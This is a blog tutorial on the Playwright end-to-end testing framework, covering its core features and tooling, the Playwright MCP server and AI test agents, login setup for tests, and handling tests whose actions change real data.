<h2 id="1-playwright-l-g-">1. What is Playwright?</h2><p>Playwright is an open-source E2E testing framework released by Microsoft in 2020, built by the team that previously created Puppeteer.</p><p>It comes with:</p><ul><li>a test runner</li><li>assertions</li><li>test isolation</li><li>parallel execution</li><li>debugging tools</li></ul><p>→ all in a single package</p><p>It supports:</p><ul><li>Chromium, Firefox, WebKit</li><li>Windows, Linux, macOS</li><li>Headless / headed mode</li><li>Mobile emulation</li></ul><p>Unlike Selenium (WebDriver), Playwright: → talks to the browser directly over a debugging protocol (the Chrome DevTools Protocol for Chromium, and Playwright's own patched builds of Firefox and WebKit) → which generally makes it faster and more stable</p><h2 id="2-core-capabilities">2. Core capabilities</h2><h3 id="auto-wait-lo-i-b-flaky-test-">Auto-wait (reduces flaky tests)</h3><p>Before acting on an element, Playwright automatically waits until it is:</p><ul><li>visible</li><li>stable</li><li>able to receive events</li><li>enabled</li></ul><pre><code class="language-typescript">await page.getByRole('button', { name: 'Submit' }).click();
</code></pre><p>No need for:</p><ul><li><code>sleep()</code></li><li><code>waitForSelector()</code></li></ul><p>Assertions also retry automatically:</p><pre><code class="language-typescript">await expect(page).toHaveURL('/dashboard');
</code></pre><h3 id="test-isolation">Test Isolation</h3><p>Each test runs in its own BrowserContext:</p><ul><li>no shared cookies</li><li>no shared localStorage</li><li>no shared session</li></ul><p>→ equivalent to an incognito window → tests can run in parallel without conflicts</p><h3 id="web-first-assertions">Web-first Assertions</h3><p>Assertions: → automatically wait until the condition holds (or the timeout expires)</p><pre><code class="language-typescript">await expect(locator).toBeVisible();
</code></pre><p>→ noticeably fewer flaky tests</p><h3 id="locator-u-ti-n-accessibility-">Locator (accessibility first)</h3><pre><code class="language-typescript">page.getByRole('button', { name: 'Login' })
</code></pre><p>instead of:</p><pre><code class="language-typescript">page.locator('.btn-primary')
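</code></pre><p>→ tests are more resilient when the UI changes</p><h3 id="cross-browser">Cross-browser</h3><pre><code class="language-typescript">projects: [
  // The project name is only a label; `browserName` selects the engine
  { name: 'chromium', use: { browserName: 'chromium' } },
  { name: 'firefox', use: { browserName: 'firefox' } },
  { name: 'webkit', use: { browserName: 'webkit' } }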
]
</code></pre><p>→ write once, run on multiple browsers</p><h2 id="3-dev-experience-tooling">3. Dev experience & tooling</h2><h3 id="trace-viewer">Trace Viewer</h3><pre><code class="language-bash">npx playwright show-trace trace.zip
</code></pre><ul><li>a timeline of the whole test</li><li>DOM snapshots</li><li>network / console logs</li></ul><p>→ you can inspect exactly what happened in a failed run, step by step</p><h3 id="ui-mode">UI Mode</h3><pre><code class="language-bash">npx playwright test --ui
</code></pre><ul><li>watch mode</li><li>time-travel debugging</li><li>pick locators directly</li></ul><h3 id="codegen">Codegen</h3><pre><code class="language-bash">npx playwright codegen https://your-app.com
</code></pre><p>→ generates tests from real user interactions</p><h3 id="html-report">HTML Report</h3><pre><code class="language-bash">npx playwright show-report
</code></pre><h3 id="screenshots-video">Screenshots & Video</h3><pre><code class="language-typescript">use: {
  screenshot: 'only-on-failure',
  video: 'retain-on-failure'
}
</code></pre><h2 id="4-advanced-features">4. Advanced features</h2><h3 id="network-interception">Network Interception</h3><pre><code class="language-typescript">await page.route('**/api/**', async route => {
  await route.fulfill({ contentType: 'application/json', body: JSON.stringify({ mock: true }) });
});
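
// Alternative to the route above (use one or the other): mock only GET
// requests and let POST/PUT/DELETE... go through to the real server.
await page.route('**/api/**', async route => {
  if (route.request().method() !== 'GET') {
    await route.continue();
    return;
  }
  await route.fulfill({ status: 200, json: { mock: true } });
});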
</code></pre><h3 id="api-testing">API Testing</h3><pre><code class="language-typescript">const res = await request.get('/api/users');
</code></pre><h3 id="multi-tab-multi-window">Multi-tab / Multi-window</h3><pre><code class="language-typescript">const [newPage] = await Promise.all([
  context.waitForEvent('page'),
  page.click('a[target=_blank]')
]);
</code></pre><h3 id="parallel-sharding">Parallel & Sharding</h3><pre><code class="language-bash">npx playwright test --shard=1/3
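# Each shard runs one third of the suite; run the other two shards
# (e.g. on separate CI machines) so the whole suite is covered:
npx playwright test --shard=2/3
npx playwright test --shard=3/3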
</code></pre><h3 id="fixtures">Fixtures</h3><pre><code class="language-typescript">test('example', async ({ page, authUser }) => {
  // authUser: a custom fixture, declared separately with test.extend()
});
</code></pre><h3 id="authentication-reuse">Authentication reuse</h3><pre><code class="language-typescript">await context.storageState({ path: 'auth.json' });
</code></pre><h2 id="5-u-nh-c-i-m">5. Pros & cons</h2><h3 id="-u-i-m">Pros</h3><ul><li>Fast and stable (direct browser protocol)</li><li>Everything built in</li><li>Native parallelism</li><li>Powerful debugging (Trace Viewer)</li></ul><h3 id="nh-c-i-m">Cons</h3><ul><li>Ecosystem not yet as large as Selenium's</li><li>The new locator style takes some getting used to</li></ul><h2 id="6-playwright-mcp-ai-i-u-khi-n-browser">6. Playwright MCP: AI controlling the browser</h2><p>The Playwright MCP server lets an LLM (AI) interact with web pages through the Model Context Protocol.</p><p>How it works:</p><ul><li>By default, the AI does not look at screenshots or pixels</li><li>The AI reads an <strong>accessibility snapshot</strong>: a text structure describing the entire UI</li></ul><p>For example, the AI sees a web page like this:</p><pre><code>- heading "todos" [level=1]
- textbox "What needs to be done?" [ref=e5]
- listitem:
  - checkbox "Toggle Todo" [ref=e10]
  - text: "Buy groceries"
</code></pre><p>Each element has a <code>ref</code> (reference ID). The AI uses the ref to interact:</p><ul><li><code>ref=e5</code> → type text into the textbox</li><li><code>ref=e10</code> → check the checkbox</li></ul><p>→ no vision model, no guessing coordinates → fast, precise, and works with MCP clients such as VS Code, Cursor, Kiro...</p><h2 id="7-playwright-test-agents-ai-t-vi-t-test">7. Playwright Test Agents: AI that writes tests</h2><p>Playwright Test Agents bring AI into the entire testing lifecycle.</p><p>There are 3 agents:</p><ul><li><strong>Planner</strong>: explores the app and produces a test plan</li><li><strong>Generator</strong>: writes test code from the plan</li><li><strong>Healer</strong>: automatically repairs tests when they fail</li></ul><p>Flow:</p><pre><code>seed → planner → generator → healer
</code></pre><h3 id="seed-file">Seed file</h3><p>You only need to write one basic test that takes the AI to the right page to test:</p><pre><code class="language-typescript">test('seed', async ({ page }) => {
  await page.goto('/');
  // log in if needed
  // verify that the app has loaded
});
</code></pre><p>The planner runs this seed to "step into" the application, then keeps exploring from there.</p><h3 id="planner-t-o-test-plan">Planner: creating the test plan</h3><p>The planner opens a browser, walks through each page, reads menus, forms, buttons, tables... and then writes a markdown file describing the test scenarios:</p><pre><code class="language-markdown">## 1. Add Valid Todo
**Steps:**
1. Click "What needs to be done?" input
2. Type "Buy groceries"
3. Press Enter

**Expected:**
- Todo appears in the list
- Counter shows "1 item left"
</code></pre><p>You review this plan, add edge cases if needed, then hand it to the generator.</p><h3 id="generator-vi-t-code-test">Generator: writing the test code</h3><p>The generator reads the plan, opens a real browser, performs each step, verifies selectors directly against the UI, and then produces <code>.spec.ts</code> code:</p><pre><code class="language-typescript">test('Add Valid Todo', async ({ page }) => {
  const input = page.getByRole('textbox', { name: 'What needs to be done?' });
  await input.fill('Buy groceries');
  await input.press('Enter');
  await expect(page.getByText('Buy groceries')).toBeVisible();
  await expect(page.getByText('1 item left')).toBeVisible();
});
</code></pre><h3 id="healer-self-healing-test">Healer: self-healing tests</h3><p>When a test fails (changed UI, stale selector, timing issue...), the healer automatically:</p><ol><li>replays the failing step</li><li>inspects the current UI</li><li>finds an equivalent element</li><li>patches the code (updates the locator, adds a wait...)</li><li>reruns the test</li></ol><p>If the feature itself is genuinely broken (rather than the test being wrong): → the healer skips the test instead of applying a meaningless fix</p><h2 id="8-authentication-trong-th-c-t-">8. Authentication in practice</h2><p>When the app requires login, tests have to sign in before running. Playwright offers two approaches depending on the mode:</p><h3 id="cli-mode-npx-playwright-test-">CLI mode (<code>npx playwright test</code>)</h3><p>Log in once, save the session to a file, and let later tests reuse it without logging in again:</p><pre><code class="language-typescript">// auth.setup.ts: runs once before all tests
import { test as setup } from '@playwright/test';
setup('login', async ({ page }) => {
  await page.goto('/login');
  await page.getByLabel('Username').fill('test');
  await page.getByLabel('Password').fill('test');
  await page.getByRole('button', { name: 'Login' }).click();

  // Save cookies + localStorage to a file
  await page.context().storageState({ path: 'playwright/.auth/user.json' });
});
</code></pre><p>Config so that tests automatically load the saved session:</p><pre><code class="language-typescript">projects: [
  { name: 'setup', testMatch: /.*\.setup\.ts/ },
  {
    name: 'chromium',
    use: { storageState: 'playwright/.auth/user.json' },
    dependencies: ['setup'],
  },
]
</code></pre><h3 id="mcp-mode-ai-agents-ch-y-test-n-l-">MCP mode (AI agents running a single test)</h3><p>When agents run a test through MCP, there is no project config → no session file. Use a custom fixture that detects the login page and logs in automatically:</p><pre><code class="language-typescript">import { test as base } from '@playwright/test';

export const test = base.extend({
  page: async ({ page }, use) => {
    const originalGoto = page.goto.bind(page);
    page.goto = async (url, options) => {
      const res = await originalGoto(url, options);
      if (page.url().includes('/login')) {
        await page.getByLabel('Username').fill('test');
        await page.getByLabel('Password').fill('test');
        await page.getByRole('button', { name: 'Login' }).click();
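        await page.waitForLoadState('domcontentloaded');
        // Navigate again to the URL the test asked for, in case the app
        // does not redirect back there after login on its own
        return originalGoto(url, options);
      }
      return res;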
    };
    await use(page);
  },
});
</code></pre><p>→ CLI mode: log in once, reuse the session → MCP mode: log in automatically when needed</p><h2 id="9-test-c-side-effect-ch-y-l-i-v-n-pass">9. Tests with side effects: still passing on rerun</h2><p>Some tests perform actions that change real data:</p><ul><li>cancelling an order</li><li>deleting an account</li><li>cancelling points</li></ul><p>The problem: the first run passes, but by the second run the data has already changed → the test fails.</p><p>The fix: check the state of the data before acting on it.</p><pre><code class="language-typescript">test('cancel order', async ({ page }) => {
  await page.goto('/orders');

  // Look for an order that has not been cancelled yet
  const cancelBtn = page.getByRole('button', { name: 'Cancel' });

  if (await cancelBtn.count() === 0) {
    // No order left to cancel → skip instead of failing
    test.skip(true, 'No orders available to cancel');
    return;
  }

  // There is an order → cancel it
  await cancelBtn.first().click();
  await expect(page.getByText('Cancelled')).toBeVisible();
});
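
// Alternative (sketch): create a fresh order through the API before each
// test, so there is always something to cancel. The '/api/orders' endpoint
// and its payload are hypothetical; relative URLs use the config's baseURL.
test.beforeEach(async ({ request }) => {
  const res = await request.post('/api/orders', { data: { item: 'demo' } });
  expect(res.ok()).toBeTruthy();
});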
</code></pre><p>→ run 1: the cancel succeeds → run 2: detects that no data is left → skip → the test never turns red, no matter how many times it runs</p><h2 id="10-k-t-lu-n">10. Conclusion</h2><p>Playwright is a modern E2E testing framework:</p><ul><li>fast</li><li>stable</li><li>cross-browser</li></ul><p>Playwright MCP opens up a new direction: → AI controlling the browser deterministically</p><p>Playwright Test Agents take testing to a new level: → AI writes tests → AI debugs → AI fixes failures</p><p>The new workflow:</p><pre><code>seed → AI generate → AI fix
</code></pre><p>For large systems, or teams that need to scale test automation, Playwright + Test Agents is a strong default choice today.</p>
</article>
</main></body></html>
GMO-Z.com Vietnam Lab Center Technology Blog

Remotion: When React Becomes a Video Creation Tool

What is Remotion?

The biggest difference: a video is just a React component